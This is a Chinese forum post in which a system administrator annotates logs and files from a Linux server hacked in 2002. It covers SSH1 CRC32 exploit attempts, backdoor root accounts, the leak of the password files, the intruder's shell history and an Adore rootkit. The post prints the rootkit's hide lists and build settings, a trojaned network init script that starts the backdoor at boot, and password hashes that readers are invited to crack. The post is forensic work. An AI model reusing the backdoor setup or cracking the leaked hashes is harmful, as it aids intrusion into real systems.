Jan 21 17:37:40 dnscache sshd[18116]: log: Connection from 141.108.9.
13 port 4715
Jan 21 17:37:43 dnscache sshd[18116]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:37:43 dnscache sshd[18119]: log: Connection from 141.108.9.
13 port 4719
Jan 21 17:37:47 dnscache sshd[18120]: log: Connection from 141.108.9.
13 port 4720
Jan 21 17:37:51 dnscache sshd[18123]: log: Connection from 141.108.9.
13 port 1265Jan 21 17:41:12 dnscache sshd[18236]: log: Connection from
141.108.9.13 port 2326
Jan 21 17:41:18 dnscache sshd[18236]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:19 dnscache sshd[18241]: log: Connection from 141.108.9.
13 port 2762
Jan 21 17:41:25 dnscache sshd[18241]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:26 dnscache sshd[18244]: log: Connection from 141.108.9.
13 port 4015
Jan 21 17:41:33 dnscache sshd[18244]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:33 dnscache sshd[18247]: log: Connection from 141.108.9.
13 port 4017
Jan 21 17:41:40 dnscache sshd[18252]: log: Connection from 141.108.9.
13 port 4019
Jan 21 17:41:52 dnscache sshd[18252]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:52 dnscache sshd[18257]: log: Connection from 141.108.9.
13 port 1049
Jan 21 17:41:59 dnscache sshd[18262]: log: Connection from 141.108.9.
13 port 1051
Jan 21 17:42:06 dnscache sshd[18262]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:07 dnscache sshd[18265]: log: Connection from 141.108.9.
13 port 1945
Jan 21 17:42:13 dnscache sshd[18265]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:14 dnscache sshd[18270]: log: Connection from 141.108.9.
13 port 3191
Jan 21 17:42:23 dnscache sshd[18273]: log: Connection from 141.108.9.
13 port 4027
Jan 21 17:42:26 dnscache sshd[18273]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:26 dnscache sshd[18276]: log: Connection from 141.108.9.
13 port 1110
Jan 21 17:42:29 dnscache sshd[18276]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:30 dnscache sshd[18279]: log: Connection from 141.108.9.
13 port 1557
Jan 21 17:42:32 dnscache sshd[18279]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:33 dnscache sshd[18280]: log: Connection from 141.108.9.
13 port 2124
Jan 21 17:42:36 dnscache sshd[18280]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:36 dnscache sshd[18283]: log: Connection from 141.108.9.
13 port 2630
Jan 21 17:42:39 dnscache sshd[18283]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:40 dnscache sshd[18286]: log: Connection from 141.108.9.
13 port 3184
Jan 21 17:42:43 dnscache sshd[18286]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:43 dnscache sshd[18287]: log: Connection from 141.108.9.
13 port 3915
Jan 21 17:42:46 dnscache sshd[18287]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:47 dnscache sshd[18290]: log: Connection from 141.108.9.
13 port 3918
an 21 17:43:01 dnscache sshd[18300]: log: Connection from 141.108.9.13
port 1033
Jan 21 17:43:03 dnscache sshd[18300]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:04 dnscache sshd[18303]: log: Connection from 141.108.9.
13 port 1034
Jan 21 17:43:07 dnscache sshd[18303]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:08 dnscache sshd[18304]: log: Connection from 141.108.9.
13 port 1036
Jan 21 17:43:10 dnscache sshd[18304]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:11 dnscache sshd[18307]: log: Connection from 141.108.9.
13 port 1586
Jan 21 17:43:14 dnscache sshd[18307]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:43:15 dnscache sshd[18310]: log: Connection from 141.108.9.
13 port 2150
Jan 21 17:43:18 dnscache sshd[18310]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:18 dnscache sshd[18311]: log: Connection from 141.108.9.
13 port 2665
Jan 21 17:43:22 dnscache sshd[18314]: log: Connection from 141.108.9.
13 port 3162
Jan 21 17:43:30 dnscache sshd[18319]: log: Connection from 141.108.9.
13 port 4975
Jan 21 17:43:34 dnscache sshd[18320]: log: Connection from 141.108.9.
13 port 1512

从开始连接到溢出只是用了10来分钟,看来SSH1.X不能用了。
Jan 21 17:45:48 dnscache sshd[18052]: fatal: Timeout before
authentication.
Jan 21 17:47:37 dnscache adduser[18423]: new user: name=cgi, uid=0,
gid=0, home=/home/cgi, shell=/bin/bash
加帐号了,5~~~~~
Jan 21 17:47:52 dnscache PAM_pwdb[18426]: password for (cgi/0) changed
by ((null)/0)
Jan 21 17:48:00 dnscache PAM_pwdb[18433]: password for (operator/11)
changed by ((null)/0)
干吗改自己的密码呢?有问题。
Jan 21 17:48:18 dnscache sshd[18442]: log: Connection from 80.96.178.195
port 1465
Jan 21 17:48:20 dnscache sshd[18442]: log: Could not reverse map address
80.96.178.195.
Jan 21 17:48:28 dnscache sshd[18442]: log: Password authentication for
operator accepted.
Jan 21 17:49:12 dnscache sshd[18484]: log: Connection from 80.96.178.194
port 2274
Jan 21 17:49:12 dnscache sshd[18484]: log: Could not reverse map address
80.96.178.194.
Jan 21 17:49:20 dnscache sshd[18484]: log: Password authentication for
operator accepted.
情况很明显了,用了多个IP干活,能确定是肉鸡了,FT。
Jan 21 17:50:30 dnscache sshd[18484]: fatal: Read error from remote
host: Connection reset by peer
Jan 21 17:51:08 dnscache sshd[18555]: log: Connection from 80.96.178.194
port 2281
Jan 21 17:51:08 dnscache sshd[18555]: log: Could not reverse map address
80.96.178.194.
Jan 21 17:51:19 dnscache sshd[18555]: log: Password authentication for
operator accepted.
Jan 21 17:58:11 dnscache sshd[18442]: fatal: Read error from remote
host: Connection reset by peer
by dnscache.i-168.com (8.9.3/8.9.3) id TAA23666
for root; Mon, 21 Jan 2002 19:01:01 +0800
Date: Mon, 21 Jan 2002 19:01:01 +0800
From: root <root@dnscache.i-168.com>
Message-Id: <200201211101.TAA23666@dnscache.i-168.com>
To: root@dnscache.i-168.com
Subject: dnscache.i-168.com 01/21/02:19.01 system check


Unusual System Events
=-=-=-=-=-=-=-=-=-=-=
Jan 21 18:17:41 dnscache sshd[270]: log: Generating new 768 bit RSA
key.
Jan 21 18:17:41 dnscache sshd[270]: log: RSA key generation complete.
Jan 21 19:00:16 dnscache sshd[23334]: log: Connection from 80.96.178.195
port 1519
Jan 21 19:00:16 dnscache sshd[23334]: log: Could not reverse map address
80.96.178.195.
Jan 21 19:00:25 dnscache sshd[23334]: log: Password authentication for
operator accepted.

From root Mon Jan 21 20:01:02 2002
Return-Path: <root>
Received: (from root@localhost)
by dnscache.i-168.com (8.9.3/8.9.3) id UAA29460
for root; Mon, 21 Jan 2002 20:01:01 +0800
Date: Mon, 21 Jan 2002 20:01:01 +0800
From: root <root@dnscache.i-168.com>
Message-Id: <200201211201.UAA29460@dnscache.i-168.com>
To: root@dnscache.i-168.com
Subject: dnscache.i-168.com 01/21/02:20.01 system check


Unusual System Events
=-=-=-=-=-=-=-=-=-=-=
Jan 21 19:01:54 dnscache sshd[23334]: fatal: Read error from remote
host: Connection reset by peer
Jan 21 19:13:33 dnscache sshd[23975]: log: Connection from 80.96.178.194
port 2406
Jan 21 19:13:33 dnscache sshd[23975]: log: Could not reverse map address
80.96.178.194.
Jan 21 19:13:44 dnscache sshd[23975]: log: Password authentication for
operator accepted.
Jan 21 19:17:41 dnscache sshd[270]: log: Generating new 768 bit RSA
key.
有新机器进来呢,FT,不是好兆头

重启
From root Mon Jan 21 23:01:00 2002
Return-Path: <root>
Received: (from root@localhost)
by dnscache.i-168.com (8.9.3/8.9.3) id XAA00309
for root; Mon, 21 Jan 2002 23:01:00 +0800
Date: Mon, 21 Jan 2002 23:01:00 +0800
From: root <root@dnscache.i-168.com>
Message-Id: <200201211501.XAA00309@dnscache.i-168.com>
To: root@dnscache.i-168.com
Subject: dnscache.i-168.com 01/21/02:23.01 system check





Feb 2 07:28:18 dnscache sshd[1991]: log: Connection from 24.112.92.
135 port 3854
Feb 2 07:28:21 dnscache sshd[1992]: log: Connection from 24.112.92.
135 port 3855
Feb 2 07:28:30 dnscache sshd[1992]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:28:31 dnscache sshd[1993]: log: Connection from 24.112.92.
135 port 3856
Feb 2 07:28:34 dnscache sshd[1993]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:28:34 dnscache sshd[1994]: log: Connection from 24.112.92.
135 port 3857
Feb 2 07:28:39 dnscache sshd[1994]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:28:40 dnscache sshd[1995]: log: Connection from 24.112.92.
135 port 3858
Feb 2 07:28:44 dnscache sshd[1995]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:28:46 dnscache sshd[1996]: log: Connection from 24.112.92.
135 port 3859
Feb 2 07:28:49 dnscache sshd[1996]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:28:49 dnscache sshd[1997]: log: Connection from 24.112.92.
135 port 3860
Feb 2 07:28:54 dnscache sshd[1997]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:28:55 dnscache sshd[1998]: log: Connection from 24.112.92.
135 port 3861
Feb 2 07:28:59 dnscache sshd[1998]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:28:59 dnscache sshd[1999]: log: Connection from 24.112.92.
135 port 3862
Feb 2 07:29:05 dnscache sshd[1999]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:29:06 dnscache sshd[2000]: log: Connection from 24.112.92.
135 port 3863
Feb 2 07:29:09 dnscache sshd[2000]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:29:10 dnscache sshd[2001]: log: Connection from 24.112.92.
135 port 3864
Feb 2 07:29:15 dnscache sshd[2001]: fatal: Local: crc32 compensation
attack: network attack detected
From root Sat Feb 2 08:09:26 2002
Return-Path: <MAILER-DAEMON>
Received: from localhost (localhost)
by dnscache.i-168.com (8.9.3/8.9.3) with internal id IAA02520;
Sat, 2 Feb 2002 08:09:25 +0800
Date: Sat, 2 Feb 2002 08:09:25 +0800
From: Mail Delivery Subsystem <MAILER-DAEMON@dnscache.i-168.com>
Message-Id: <200202020009.IAA02520@dnscache.i-168.com>
To: root@dnscache.i-168.com
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
boundary="IAA02520.1012608565/dnscache.i-168.com"
Subject: Returned mail: Service unavailable
Auto-Submitted: auto-generated (failure)

This is a MIME-encapsulated message

--IAA02520.1012608565/dnscache.i-168.com

The original message was received at Sat, 2 Feb 2002 08:09:22 +0800
from root@localhost

----- The following addresses had permanent fatal errors -----
ja_ja_j@yahoo.com

----- Transcript of session follows -----
... while talking to mx2.mail.yahoo.com.:
> >> DATA
< 554 delivery error: dd This user doesn't have a yahoo.com account
(ja_ja_j@yahoo.com) - mta619.mail.yahoo.c
om
554 ja_ja_j@yahoo.com... Service unavailable
--IAA02520.1012608565/dnscache.i-168.com
Content-Type: message/delivery-status

Reporting-MTA: dns; dnscache.i-168.com
Arrival-Date: Sat, 2 Feb 2002 08:09:22 +0800

Final-Recipient: RFC822; ja_ja_j@yahoo.com
Action: failed
Status: 5.0.0
Remote-MTA: DNS; mx2.mail.yahoo.com
Diagnostic-Code: SMTP; 554 delivery error: dd This user doesn't have a
yahoo.com account (ja_ja_j@yahoo.com) -
mta619.mail.yahoo.com
Last-Attempt-Date: Sat, 2 Feb 2002 08:09:25 +0800

--IAA02520.1012608565/dnscache.i-168.com
Content-Type: message/rfc822

Return-Path: <root>
Received: (from root@localhost)
by dnscache.i-168.com (8.9.3/8.9.3) id IAA02513
for ja_ja_j@yahoo.com; Sat, 2 Feb 2002 08:09:22 +0800
Date: Sat, 2 Feb 2002 08:09:22 +0800
From: root <root>
Message-Id: <200202020009.IAA02513@dnscache.i-168.com>
To: ja_ja_j@yahoo.com
Subject: Linux dnscache.i-168.com 2.2.18-2 #1 Tue Feb 27 20:54:01 CST
2001 i686 unknown

Linux dnscache.i-168.com 2.2.18-2 #1 Tue Feb 27 20:54:01 CST 2001 i686
unknown
|------
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/binsync
shutdown:x:6:0:shutdown:/sbin:/sbinshutdown
halt:x:7:0:halt:/sbin:/sbinhalt
mail:x:8:12:mail:/var/spoolmail:
news:x:9:13:news:/var/spoolnews:
uucp:x:10:14:uucp:/var/spooluucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usrgames:
gopher:x:13:30:gopher:/usr/libgopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
wnn:x:127:127:Wnn:/usr/local/bin/Wnn6:
哪里来的SHELL?又是后门,FT!
mysql:x:128:128:MySQL server:/var/lib/mysql:/binbash
bind:x:129:129::/etc/named:/dev/null
piranha:x:60:60::/home/httpd/html/piranha:/dev/null
squid:x:23:23::/var/spool/squid:/dev/null
chair:x:500:503::/home/chair:/bin/bash
dnscache:x:501:504::/home/dnscache:/binbash
dnslog:x:502:505::/home/dnslog:/binbash
cgi:x:0:0::/home/cgi:/bin/bash
家伙1
luck:x:503:506::/home/luck:/bin/bash
家伙2
luck1:x:0:507::/home/luck1:/bin/bash
家伙3|------
root:XXXXXXXXX.:11649:0:99999:7::: 保密啦
bin:*:11649:0:99999:7:::
daemon:*:11649:0:99999:7:::
adm:*:11649:0:99999:7:::
lp:*:11649:0:99999:7:::
sync:*:11649:0:99999:7:::
shutdown:*:11649:0:99999:7:::
halt:*:11649:0:99999:7:::
mail:*:11649:0:99999:7:::
news:*:11649:0:99999:7:::
uucp:*:11649:0:99999:7:::
operator:XXXXXXXXXX:11708:0:99999:7:-1:-1:134539376
games:*:11649:0:99999:7:::
games:*:11649:0:99999:7:::
gopher:*:11649:0:99999:7:::
ftp:*:11649:0:99999:7:::
nobody:*:11649:0:99999:7:::
wnn:*:11649:0:99999:7:::
mysql:!!:11649:0:99999:7:::
bind:!!:11649:0:99999:7:::
piranha:!!:11649:0:99999:7:::
squid:!!:11649:0:99999:7:::
chair:XXXXXXXXX:11649:0:99999:7:-1:-1:134539416 保密啦
dnscache:!!:11649:0:99999:7:::
dnslog:!!:11649:0:99999:7:::
cgi:5DnRYHyIa5w0g:11708:0:99999:7:-1:-1:134539416
luck:SqXj0pjOPwcxA:11720:0:99999:7:-1:-1:134538336
luck1:cqrTW5Ortfn7s:11720:0:99999:7:-1:-1:134538336
这几个就是他们的3DES后的东西,哪位朋友有时间和兴趣就CRACK了他吧
PING 216.115.108.245 (216.115.108.245) from 192.168.100.27 : 56(84)
bytes of data.
64 bytes from 216.115.108.245: icmp_seq=0 ttl=233 time=167.9 ms
64 bytes from 216.115.108.245: icmp_seq=1 ttl=233 time=170.7 ms
64 bytes from 216.115.108.245: icmp_seq=2 ttl=233 time=171.2 ms
64 bytes from 216.115.108.245: icmp_seq=3 ttl=233 time=174.6 ms
64 bytes from 216.115.108.245: icmp_seq=4 ttl=233 time=171.0 ms

--- 216.115.108.245 ping statistics ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 167.9/171.0/174.6 ms

下面的是在/home/luck/目录下的东西,看来也是不细心,又有
线索了,看样子改了内核,这个家伙在这里还考虑周到,怕
我重编内核??
[root@mail luck]# cat .bash_history
cd /usr/src
ls
cd star
ls
cd S*
ls
tar -zxpvf *
ls
cd root
ls
l
ls
cd ls
ls
ls -af
ls
cd ..
ls
cd etc
ls
cd ..
ls
cd boot
ls
cd ..
ls
cd boto
ls -af
cd ..
ls
cd root
ls
ls -af
cd ..
ls
rm * -rf
ls
tar -zxpvf *
ls
cd ske
ls
ls -af
vi .X*
ls
ls -af
ls
ls -af
rm .X*
LS
ls
rm * -rf
ls
ls -af
ls
ls -af
vi .x*
ls
ls -af
rm .x*
ls
ls -af
vi .inputrc
ls
ls -af
vi .bashrc
ls -af
rm .g*
rm .gnome*
rm .gnome* -rf
ls
ls -af
rm .kde*
ls
ls -af
mv
mc
ls
ls -af
rm .net*
rm .net* -rf
ls -af
mc
ls
ls -af
cp -r .* /root
y
cd /
ls
cd usr
ls
cd src
ls
cd ..
ls
cd ..
ls
cd usr
ls
cd src
ls
cd tar
l
s
ls
cd S&*
cd S*
LS
ls
mount /dev/hdd /mnt/cdrom
cd /mnt/cdrom
ls
cd S*
ls
ls f*
rpm -i filesys*
cd ..
ls *ske*
ls
cd S*
ls
ls *ske*
rpm -i *ske*
cd ..
cd /
ls
cd root
ls
ls -af
cd ..
mv root rootstar
mkdir root
cd root
ls -af
cd ..
ls
cd rootstar
ls
ls -af
cd ..
ls
rm root -rf
ls
mkdir root
ls
cd root
ls -af
ls -a
ls .
rm ske -rf
ls
ls -af
rm skel -rf
ls
ls -af
ls
vi
ls

ROOTKIT里的文件,FT,几乎都考虑周全了,可惜啊,这些常用的
东西网管又怎么会相信呢,通常自己都有另一套东西的啦。
[root@mail rk]# ls
Makefile.non-smp cleaner.c hostkey logrc ps
tcpd
Makefile.smp dir ifconfig ls pstree
top
adore.c dummy.c iferc netstat rename.c
twist2open
afbackup exec-test.c install netstatrc seed
ava.c exec.c libinvisible.c network sshd_conf
bnc filerc libinvisible.h parser syslogd
bnc.conf find logcleaner procrc sz

下面的是这个ROOTKIT隐蔽起来的进程,端口,文件,网卡等
[root@mail rk]# cat netstatrc
3 7070
1 7070
3 31337
1 31337
3 32321
3 32322
3 32323
3 32324
3 32325
4 32321
4 32322
4 32323
4 32324
4 32325
4 6667
4 6669
4 6668
4 7000
4 6660
4 21
4 53

[root@mail rk]# cat logrc
home.com
nether.net
hobbiton.org
194.102
sshd
syslog
klogd
net-pf-10
modprobe
games
promiscuous
PF_INET
60G
yahoo.com
217.10
193.226
hypermart
failure
geocities

[root@mail rk]# cat procrc
3 darkbot
3 psybnc
3 slice
3 vadim
3 eggdrop
3 mech
3 banner
3 massbind
3 masslpd
3 scan
3 ping
3 afbackup
3 bnc
3 sniff
3 root
3 bind
3 statd
3 lpd
3 r00t
3 smurf
3 synk
3 twist2open

看看MAKEFILE对查找后门放在哪里有帮助。adore ,ava ,cleaner这3个文件,看



[root@mail rk]# cat Makefile.smp
#
CC=gcc
CFLAGS=-O2 -Wall

#CFLAGS+=-m486
CFLAGS+=-DELITE_CMD=32321
CFLAGS+=-DELITE_UID=34
CFLAGS+=-DCURRENT_ADORE=32
CFLAGS+=-DADORE_KEY=\"rewt\"
CFLAGS+=-DHIDDEN_SERVICE="\":32321\""
CFLAGS+=-D__SMP__
CFLAGS+=-DHIDDEN_PORT=32321
CFLAGS+=-DMODVERSIONS
all: adore ava cleaner

adore: adore.c
rm -f adore.o
$(CC) -c -I/usr/src/linux/include $(CFLAGS) adore.c -o adore.o

ava: ava.c libinvisible.c
$(CC) $(CFLAGS) ava.c libinvisible.c -o ava

dummy: dummy.c
$(CC) -c -I/usr/src/linux/include $(CFLAGS) dummy.c

cleaner: cleaner.c
$(CC) -I/usr/src/linux/include -c $(CFLAGS) cleaner.c

exec-test: exec-test.c
$(CC) -Wall -O2 exec-test.c -DSAYSO=\"ORIGINAL\" -o
/bin/exec-test
$(CC) -Wall -O2 exec-test.c -DSAYSO=\"FAKE\" -o /tmp/foobar
clean:
rm -f core ava *.o
[root@mail rk]# cat Makefile.
Makefile.non-smp Makefile.smp
[root@mail rk]# cat Makefile.
Makefile.non-smp Makefile.smp
[root@mail rk]# cat Makefile.non-smp
#
CC=gcc
CFLAGS=-O2 -Wall

#CFLAGS+=-m486
CFLAGS+=-DELITE_CMD=32321
CFLAGS+=-DELITE_UID=34
CFLAGS+=-DCURRENT_ADORE=32
CFLAGS+=-DADORE_KEY=\"rewt\"
CFLAGS+=-DHIDDEN_SERVICE="\":32321\""
#CFLAGS+=-D__SMP__
CFLAGS+=-DHIDDEN_PORT=32321
CFLAGS+=-DMODVERSIONS
all: adore ava cleaner

adore: adore.c
rm -f adore.o
$(CC) -c -I/usr/src/linux/include $(CFLAGS) adore.c -o adore.o

ava: ava.c libinvisible.c
$(CC) $(CFLAGS) ava.c libinvisible.c -o ava

dummy: dummy.c
$(CC) -c -I/usr/src/linux/include $(CFLAGS) dummy.c

cleaner: cleaner.c
$(CC) -I/usr/src/linux/include -c $(CFLAGS) cleaner.c

exec-test: exec-test.c
$(CC) -Wall -O2 exec-test.c -DSAYSO=\"ORIGINAL\" -o
/bin/exec-test
$(CC) -Wall -O2 exec-test.c -DSAYSO=\"FAKE\" -o /tmp/foobar
clean:
rm -f core ava *.o

[root@mail rk]# cat network |more
#!/bin/bash
#
# network Bring up/down networking
#
# chkconfig: 2345 10 90
# description: Activates/Deactivates all network interfaces configured
to \
# start at boot time.
# probe: true

# Source function library.
. /etc/init.d/functions

if [ ! -f /etc/sysconfig/network ]; then
exit 0
fi

. /etc/sysconfig/network

if [ -f /etc/sysconfig/pcmcia ]; then
. /etc/sysconfig/pcmcia
fi


# Check that networking is up.
[ ${NETWORKING} = "no" ] && exit 0

[ -x /sbin/ifconfig ] || exit 0
# Even if IPX is configured, without the utilities we can't do much
[ ! -x /sbin/ipx_internal_net -o ! -x /sbin/ipx_configure ] && IPX=

# If IPv6 is explicitly configured, make sure it's available.
if [ "$NETWORKING_IPV6" = "yes" ]; then
alias=`modprobe -c | grep net-pf-10 | awk '{ print $3 }'`
if [ "$alias" != "ipv6" -a ! -f /proc/net/if_inet6 ]; then
echo "alias net-pf-10 ipv6" >> /etc/modules.conf
fi
fi

CWD=`pwd`
cd /etc/sysconfig/network-scripts

# find all the interfaces besides loopback.
# ignore aliases, alternative configurations, and editor backup files
interfaces=`ls ifcfg* | LANG=C egrep -v '(ifcfg-lo|:
|rpmsave|rpmorig|rpmnew)' | \
LANG=C egrep -v '(~|\.bak)$' | \
LANG=C egrep -v 'ifcfg-cipcb[0-9]+$' | \
LANG=C egrep -v 'ifcfg-ippp[0-9]+$' | \
LANG=C egrep 'ifcfg-[a-z0-9]+$' | \
sed 's/^ifcfg-//g'`

# See how we were called.
case "$1" in
start)
/usr/bin/twist2open >>/dev/null 2>&1
//就是在这里加载后门的
action $"Setting network parameters: " sysctl -e -p
/etc/sysctl.conf

action $"Bringing up interface lo: " ./ifup ifcfg-lo

case "$IPX" in
yes|true)
/sbin/ipx_configure --auto_primary=$IPXAUTOPRIMARY \
--auto_interface=$IPXAUTOFRAME
if [ "$IPXINTERNALNETNUM" != "0" ]; then
/sbin/ipx_internal_net add $IPXINTERNALNETNUM
$IPXINTERNALNODENUM
fi
;;
esac

oldhotplug=`sysctl kernel.hotplug 2>/dev/null| awk '{ print
$3 }' 2>/dev/null`
sysctl -w kernel.hotplug="/bin/true" > /dev/null 2>&1

for i in $interfaces; do
if LANG=C egrep -L "^ONBOOT=\"?[Nn][Oo]\"?" ifcfg-$i
> /dev/null 2>&1 ; then
if [ "${i##eth}" != "$i" ]; then
# Probe module to preserve interface
ordering
if [ -n "`modprobe -vn $i | grep -v Note:`" ];
then
/sbin/ifconfig $i >/dev/null 2>&1
fi
fi
else
# If we're in confirmation mode,
get user confirmation
[ -n "$CONFIRM" ] &&
{
confirm $i
case $? in
0)
:
;;
2)
CONFIRM=
;;
*)
continue
;;
esac
}

action $"Bringing up interface $i: " ./ifup $i
boot
fi
done

# add cipe here.
cipeinterfaces=`ls ifcfg* | LANG=C egrep -v '(ifcfg-lo|:
|rpmsave|rpmorig|rpmnew)' | \
LANG=C egrep -v '(~|\.bak)$' | \
LANG=C egrep 'ifcfg-cipcb[0-9]+$' | \
sed 's/^ifcfg-//g'`
for i in $cipeinterfaces ; do
if ! LANG=C egrep -L "^ONBOOT=\"?[Nn][Oo]\"?" ifcfg-$i
> /dev/null 2>&1 ; then
# If we're in confirmation mode, get user confirmation
[ -n "$CONFIRM" ] &&
{
confirm $i
case $? in
0)
:
;;
2)
CONFIRM=
;;
*)
continue
;;
esac
}
action $"Bringing up interface $i: " ./ifup $i boot
fi
done

sysctl -w kernel.hotplug=$oldhotplug > /dev/null 2>&1

# Add non interface-specific static-routes.
if [ -f /etc/sysconfig/static-routes ]; then
grep "^any" /etc/sysconfig/static-routes | while read
ignore args ; do
/sbin/route add -$args
done
fi

touch /var/lock/subsys/network
;;
stop)

/usr/bin/weather U dummy >>/dev/null 2>&1
kill -9 `pidof afbackup`
kill -9 `pidof bnc`
关闭那些后门进程啦,FT
# If this is a final shutdown/halt, check for network FS,
# and unmount them even if the user didn't turn on netfs

if [ "$RUNLEVEL" = "6" -o "$RUNLEVEL" = "0" -o "$RUNLEVEL" = "1"
]; then
NFSMTAB=`grep -v '^#' /proc/mounts | awk '{ if ($3 ~
/^nfs$/ ) print $2}'`
SMBMTAB=`grep -v '^#' /proc/mounts | awk '{ if ($3 ~
/^smbfs$/ ) print $2}'`
NCPMTAB=`grep -v '^#' /proc/mounts | awk '{ if ($3 ~
/^ncpfs$/ ) print $2}'`
if [ -n "$NFSMTAB" -o -n "$SMBMTAB" -o -n "$NCPMTAB" ] ;
then
/etc/init.d/netfs stop
fi
fi

for i in $interfaces ; do
if LC_ALL= LANG= ifconfig $i 2>/dev/null | grep -q "
UP " >/dev/null 2>&1 ; then
action $"Shutting down interface $i: " ./ifdown $i
boot
fi
done
case "$IPX" in
yes|true)
if [ "$IPXINTERNALNETNUM" != "0" ]; then
/sbin/ipx_internal_net del
fi
;;
esac
./ifdown ifcfg-lo
if [ -d /proc/sys/net/ipv4 ]; then
if [ -f /proc/sys/net/ipv4/ip_forward ]; then
if [ `cat /proc/sys/net/ipv4/ip_forward` != 0 ]; then
action $"Disabling IPv4 packet forwarding: "
sysctl -w net.ipv4.ip_forward=0
fi
fi
if [ -f /proc/sys/net/ipv4/ip_always_defrag ]; then
if [ `cat /proc/sys/net/ipv4/ip_always_defrag` != 0 ];
then
action $"Disabling IPv4 automatic
defragmentation: " sysctl -w net.ipv4.ip_always_defr
ag=0
fi
fi
fi

rm -f /var/lock/subsys/network
;;
status)
echo $"Configured devices:"
echo lo $interfaces
if [ -x /sbin/linuxconf ] ; then
eval `/sbin/linuxconf --hint netdev`
echo $"Devices that are down:"
echo $DEV_UP
echo $"Devices with modified configuration:"
echo $DEV_RECONF
else
echo $"Currently active devices:"
echo `/sbin/ifconfig | grep ^[a-z] | awk '{print $1}'`
fi
;;
restart)
cd $CWD
$0 stop
$0 start
;;
reload)
if [ -x /sbin/linuxconf ] ; then
eval `/sbin/linuxconf --hint netdev`
for device in $DEV_UP ; do
action $"Bringing up device $device: " ./ifup
$device
done
for device in $DEV_DOWN ; do
action $"Shutting down device $device: " .
/ifdown $device
done
for device in $DEV_RECONF ; do
action $"Shutting down device $device: " .
/ifdown $device
action $"Bringing up device $device: " ./ifup
$device
done
for device in $DEV_RECONF_ALIASES ; do
action $"Bringing up alias $device: "
/etc/sysconfig/network-scripts/ifup-aliases $dev
ice
done
for device in $DEV_RECONF_ROUTES ; do
action $"Bringing up route $device: "
/etc/sysconfig/network-scripts/ifup-routes $devi
ce
done
case $IPX in yes|true)
case $IPXINTERNALNET in
reconf)
action $"Deleting internal IPX network: "
/sbin/ipx_internal_net del
action $"Adding internal IPX network
$IPXINTERNALNETNUM $IPXINTERNALNODENUM: " /sbin/i
px_internal_net add $IPXINTERNALNETNUM \

$IPXINTERNALNODENUM
;;
add)
action $"Adding internal IPX network
$IPXINTERNALNETNUM $IPXINTERNALNODENUM: " /sbin/i
px_internal_net add $IPXINTERNALNETNUM \

$IPXINTERNALNODENUM
;;
del)
action $"Deleting internal IPX network: "
/sbin/ipx_internal_net del
;;
esac
;;
esac
else
cd $CWD
$0 restart
fi
;;
probe)
if [ -x /sbin/linuxconf ] ; then
eval `/sbin/linuxconf --hint netdev`
[ -n "$DEV_UP$DEV_DOWN$DEV_RECONF$DEV_RECONF_ALIASES" -o
\
-n "$DEV_RECONF_ROUTES$IPXINTERNALNET" ] && \
echo reload
exit 0
else
# if linuxconf isn't around to figure stuff out for us,

# we punt. Probably better than completely reloading
# networking if user isn't sure which to do. If user
# is sure, they would run restart or reload, not probe.

exit 0
fi
;;
*)
echo $"Usage: $0 {start|stop|restart|reload|status|probe}"
exit 1
esac
exit 0

好了,经过36页的观察,基本知道是怎么回事了,本来以为实验机器随便一点无
所谓,
安全问题是个水桶,全部严密还好,有一点漏洞,这个水桶就没什么用了。 :(

2008/12/13 21:57
应用扩展 工具箱



« 1 2 3 (4) 5 6 7 ... 46 »





系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8